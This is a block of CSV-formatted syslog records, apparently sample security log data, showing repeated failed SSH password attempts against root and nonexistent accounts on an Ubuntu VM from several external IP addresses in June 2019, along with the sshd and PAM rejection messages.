+15227,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:48,UbuntuDevEnv,2019-06-26 05:20:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31212 ssh2,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
+15228,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:20:52,UbuntuDevEnv,2019-06-26 05:20:52,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31212 ssh2,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
+15229,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:20:58,auth,UbuntuDevEnv,info,message repeated 2 times: [ Failed password for root from 58.242.82.13 port 31212 ssh2],9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
+15230,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:21:01,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 31212 ssh2 [preauth],9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
+15231,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:21:01,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 31212: Too many authentication failures [preauth],9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,31212,,
+15232,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:21:01,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15233,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:21:01,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 31212 ssh2,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,31212,,
+15234,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:02,UbuntuDevEnv,2019-06-26 05:21:01,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9152,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15235,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:06,UbuntuDevEnv,2019-06-26 05:21:05,auth,UbuntuDevEnv,info,Invalid user nestor from 140.143.223.242 port 57808,9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nestor,140.143.223.2,57808,,
+15236,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:06,UbuntuDevEnv,2019-06-26 05:21:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15237,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:06,UbuntuDevEnv,2019-06-26 05:21:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15238,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:06,UbuntuDevEnv,2019-06-26 05:21:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15239,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:07,UbuntuDevEnv,2019-06-26 05:21:07,auth,UbuntuDevEnv,info,Failed password for invalid user nestor from 140.143.223.242 port 57808 ssh2,9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nestor,140.143.223.2,57808,,
+15240,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:07,UbuntuDevEnv,2019-06-26 05:21:07,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43278 ssh2,9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43278,,
+15241,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:08,UbuntuDevEnv,2019-06-26 05:21:07,auth,UbuntuDevEnv,info,Disconnected from invalid user nestor 140.143.223.242 port 57808 [preauth],9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nestor,140.143.223.2,57808,,
+15242,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:08,UbuntuDevEnv,2019-06-26 05:21:07,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 57808:11: Bye Bye [preauth],9269,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,57808,,
+15243,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:12,UbuntuDevEnv,2019-06-26 05:21:11,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 43278 ssh2,9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43278,,
+15244,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:25,UbuntuDevEnv,2019-06-26 05:21:24,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 43278 ssh2],9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43278,,
+15245,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:25,UbuntuDevEnv,2019-06-26 05:21:24,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15246,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:25,UbuntuDevEnv,2019-06-26 05:21:24,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 43278 ssh2 [preauth],9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,43278,,
+15247,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:25,UbuntuDevEnv,2019-06-26 05:21:24,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15248,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:25,UbuntuDevEnv,2019-06-26 05:21:24,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 43278: Too many authentication failures [preauth],9264,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,43278,,
+15249,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:29,UbuntuDevEnv,2019-06-26 05:21:29,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15250,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:31,UbuntuDevEnv,2019-06-26 05:21:31,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 51887 ssh2,9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,51887,,
+15251,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:44,UbuntuDevEnv,2019-06-26 05:21:44,auth,UbuntuDevEnv,info,Invalid user djoshi from 196.41.208.238 port 43908,9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,djoshi,196.41.208.2,43908,,
+15252,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:44,UbuntuDevEnv,2019-06-26 05:21:42,auth,UbuntuDevEnv,info,message repeated 4 times: [ Failed password for root from 58.242.82.13 port 51887 ssh2],9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,51887,,
+15253,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:44,UbuntuDevEnv,2019-06-26 05:21:44,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.41.208.238,9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.41.208.2,,0,
+15254,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:44,UbuntuDevEnv,2019-06-26 05:21:44,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15255,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:45,UbuntuDevEnv,2019-06-26 05:21:45,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 51887 ssh2,9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,51887,,
+15256,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:45,UbuntuDevEnv,2019-06-26 05:21:45,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 51887 ssh2 [preauth],9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,51887,,
+15257,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:45,UbuntuDevEnv,2019-06-26 05:21:45,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15258,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:45,UbuntuDevEnv,2019-06-26 05:21:45,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 51887: Too many authentication failures [preauth],9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,51887,,
+15259,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:45,UbuntuDevEnv,2019-06-26 05:21:45,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,9353,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15260,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:47,UbuntuDevEnv,2019-06-26 05:21:46,auth,UbuntuDevEnv,info,Failed password for invalid user djoshi from 196.41.208.238 port 43908 ssh2,9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,djoshi,196.41.208.2,43908,,
+15261,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:47,UbuntuDevEnv,2019-06-26 05:21:46,auth,UbuntuDevEnv,info,Disconnected from invalid user djoshi 196.41.208.238 port 43908 [preauth],9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,djoshi,196.41.208.2,43908,,
+15262,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:47,UbuntuDevEnv,2019-06-26 05:21:46,auth,UbuntuDevEnv,info,Received disconnect from 196.41.208.238 port 43908:11: Bye Bye [preauth],9408,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.41.208.2,43908,,
+15263,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:21:58,UbuntuDevEnv,2019-06-26 05:21:57,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15264,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:00,UbuntuDevEnv,2019-06-26 05:21:59,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60307 ssh2,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60307,,
+15265,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:03,UbuntuDevEnv,2019-06-26 05:22:02,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60307 ssh2,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60307,,
+15266,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:13,UbuntuDevEnv,2019-06-26 05:22:11,auth,UbuntuDevEnv,info,message repeated 3 times: [ Failed password for root from 58.242.82.13 port 60307 ssh2],9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60307,,
+15267,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:13,UbuntuDevEnv,2019-06-26 05:22:13,auth,UbuntuDevEnv,info,Invalid user diu from 45.55.190.46 port 60630,9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diu,45.55.190.4,60630,,
+15268,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:13,UbuntuDevEnv,2019-06-26 05:22:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=45.55.190.46,9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,45.55.190.4,,0,
+15269,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:13,UbuntuDevEnv,2019-06-26 05:22:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15270,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:14,UbuntuDevEnv,2019-06-26 05:22:13,auth,UbuntuDevEnv,err,error: maximum authentication attempts exceeded for root from 58.242.82.13 port 60307 ssh2 [preauth],9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60307,,
+15271,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:14,UbuntuDevEnv,2019-06-26 05:22:13,auth,UbuntuDevEnv,info,Failed password for root from 58.242.82.13 port 60307 ssh2,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,60307,,
+15272,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:14,UbuntuDevEnv,2019-06-26 05:22:13,authpriv,UbuntuDevEnv,alert,PAM service(sshd) ignoring max retries  6 > 3,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,,,,
+15273,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:14,UbuntuDevEnv,2019-06-26 05:22:13,authpriv,UbuntuDevEnv,notice,PAM 5 more authentication failures  logname= uid=0 euid=0 tty=ssh ruser= rhost=58.242.82.13  user=root,9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,,0,
+15274,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:14,UbuntuDevEnv,2019-06-26 05:22:13,auth,UbuntuDevEnv,info,Disconnecting authenticating user root 58.242.82.13 port 60307: Too many authentication failures [preauth],9429,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,58.242.82.1,60307,,
+15275,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:15,UbuntuDevEnv,2019-06-26 05:22:14,auth,UbuntuDevEnv,info,Disconnected from invalid user diu 45.55.190.46 port 60630 [preauth],9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diu,45.55.190.4,60630,,
+15276,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:15,UbuntuDevEnv,2019-06-26 05:22:14,auth,UbuntuDevEnv,info,Failed password for invalid user diu from 45.55.190.46 port 60630 ssh2,9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diu,45.55.190.4,60630,,
+15277,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:15,UbuntuDevEnv,2019-06-26 05:22:14,auth,UbuntuDevEnv,info,Received disconnect from 45.55.190.46 port 60630:11: Bye Bye [preauth],9448,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,45.55.190.4,60630,,
+15278,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:26,UbuntuDevEnv,2019-06-26 05:22:25,auth,UbuntuDevEnv,info,Disconnected from 58.242.82.13 port 5652 [preauth],9534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5652,,
+15279,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:26,UbuntuDevEnv,2019-06-26 05:22:25,auth,UbuntuDevEnv,info,Received disconnect from 58.242.82.13 port 5652:11:  [preauth],9534,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,58.242.82.1,5652,,
+15280,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:22:40,UbuntuDevEnv,2019-06-26 05:22:39,auth,UbuntuDevEnv,info,Connection closed by 58.242.82.13 port 9573 [preauth],9578,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,58.242.82.1,9573,,
+15281,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:12,UbuntuDevEnv,2019-06-26 05:23:12,auth,UbuntuDevEnv,info,Invalid user office from 140.143.223.242 port 44910,9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,140.143.223.2,44910,,
+15282,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:12,UbuntuDevEnv,2019-06-26 05:23:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+15283,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:12,UbuntuDevEnv,2019-06-26 05:23:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=140.143.223.242,9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,140.143.223.2,,0,
+15284,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:14,UbuntuDevEnv,2019-06-26 05:23:13,auth,UbuntuDevEnv,info,Failed password for invalid user office from 140.143.223.242 port 44910 ssh2,9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,140.143.223.2,44910,,
+15285,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:14,UbuntuDevEnv,2019-06-26 05:23:14,auth,UbuntuDevEnv,info,Received disconnect from 140.143.223.242 port 44910:11: Bye Bye [preauth],9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,140.143.223.2,44910,,
+15286,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 05:23:14,UbuntuDevEnv,2019-06-26 05:23:14,auth,UbuntuDevEnv,info,Disconnected from invalid user office 140.143.223.242 port 44910 [preauth],9725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,office,140.143.223.2,44910,,
